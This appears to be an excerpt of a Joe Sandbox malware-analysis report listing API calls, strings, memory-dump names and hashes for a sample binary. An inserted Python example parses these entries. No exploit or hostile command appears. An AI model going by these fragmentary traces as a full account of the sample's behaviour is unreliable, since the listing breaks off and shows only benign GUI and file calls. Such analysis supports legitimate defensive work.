                                                                                                                    • API ID: __wcsicoll$IconLoad
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 2485277191-404129466
                                                                                                                    • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                    • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                    • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                    • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                    • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                    • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3869813825-0
                                                                                                                    • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                    • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                    • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                    • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00464B28
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                    • _wcslen.LIBCMT ref: 00464C28
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                    • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                    • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                    • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 1914653954-2746444292
                                                                                                                    • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                    • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                    • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                    • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                    APIs
                                                                                                                    • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                                    • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                                    • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                                    • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                    • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1153243558-438819550
                                                                                                                    • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                    • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                    • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                    • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
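The per-function listings above are easier to triage as structured records than as bullet text. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the "• Name.MODULE(args), ref: ADDR" lines and the .sdmp names of one entry, orders the calls by call-site address and decodes each dumped region's protection and type. The split of the .sdmp name into process / stage / dump-id / base / protection / unknown / type / unknown fields is an assumption inferred from the names on this page (the fifth and seventh fields decode cleanly as Win32 PAGE_* and MEM_IMAGE constants, which matches the PE layout reported: code at 0x401000 executable, headers and .rdata read-only, data read-write); the sample text is constructed from the entry above.

```python
"""Parse one Joe Sandbox function entry ('APIs' + 'Memory Dump Source').
Added example; the .sdmp field layout is an assumption inferred from the report."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Win32 page-protection and region-type constants from <winnt.h>.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass
class ApiCall:
    name: str                       # e.g. GetCurrentDirectoryW
    module: str                     # KERNEL32/USER32, or LIBCMT for the static CRT
    args: List[str]                 # arguments as printed; '?' = not resolved
    ref: int                        # call-site address
    subcall: Optional[int] = None   # set for 'Part of subcall function X' lines


@dataclass
class DumpRegion:
    base: int
    protect: str
    region_type: str
    raw: str


API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Assumed layout: <proc>.<stage>.<dumpid>.<base>.<protect>.<?>.<type>.<?>.sdmp
# The match ends at '.sdmp', so trailing page text after the name is ignored.
SDMP_RE = re.compile(
    r"(\d{8})\.(\d{8})\.(\d+)\.(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})"
    r"\.[0-9A-Fa-f]{8}\.(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp"
)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return an ApiCall for every '• Name.MODULE(...), ref: ADDR' line."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), sub))
    return calls


def parse_dump_regions(text: str) -> List[DumpRegion]:
    """Decode every .sdmp name in the text into base, protection and type."""
    regions = []
    for m in SDMP_RE.finditer(text):
        prot = int(m.group("protect"), 16) & 0xFF   # drop PAGE_GUARD/NOCACHE bits
        typ = int(m.group("type"), 16)
        regions.append(DumpRegion(int(m.group("base"), 16),
                                  PAGE_PROTECT.get(prot, f"0x{prot:02X}"),
                                  MEM_TYPE.get(typ, f"0x{typ:X}"), m.group(0)))
    return regions


def executable_regions(regions: List[DumpRegion]) -> List[DumpRegion]:
    return [r for r in regions if "EXECUTE" in r.protect]


def call_sequence(calls: List[ApiCall], direct_only: bool = True) -> List[str]:
    """'Name.MODULE' strings in call-site order; subcall lines dropped by default."""
    seq = sorted((c for c in calls if not (direct_only and c.subcall)),
                 key=lambda c: c.ref)
    return [f"{c.name}.{c.module}" for c in seq]


# Constructed sample: lines copied from the entry above (function at 0045CE39..).
SAMPLE = """APIs
• _wcsncpy.LIBCMT ref: 0045CE39
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
"""

if __name__ == "__main__":
    for name in call_sequence(parse_api_lines(SAMPLE)):
        print(name)
    for r in parse_dump_regions(SAMPLE):
        print(f"{r.base:#010x} {r.protect} {r.region_type}")
```

The 0x104 (MAX_PATH) literal and the "*.*" string in the entry are what to look for when deciding whether this routine walks directories; the region decoder tells you which dump to disassemble (only the 0x401000 region is executable in this sample).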
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicoll
                                                                                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                    • API String ID: 3832890014-4202584635
                                                                                                                    • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                    • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                    • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                    • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                    • GetFocus.USER32 ref: 0046A0DD
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$CtrlFocus
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1534620443-4108050209
                                                                                                                    • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                    • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                    • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                    • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateDestroy
                                                                                                                    • String ID: ,$tooltips_class32
                                                                                                                    • API String ID: 1109047481-3856767331
                                                                                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1441871840-4108050209
                                                                                                                    • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                    • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                    • __swprintf.LIBCMT ref: 00460915
                                                                                                                    • __swprintf.LIBCMT ref: 0046092D
                                                                                                                    • _wprintf.LIBCMT ref: 004609E1
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 3631882475-2268648507
                                                                                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                    APIs
                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                    • SendMessageW.USER32 ref: 00471740
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                    • SendMessageW.USER32 ref: 0047184F
                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4116747274-0
                                                                                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
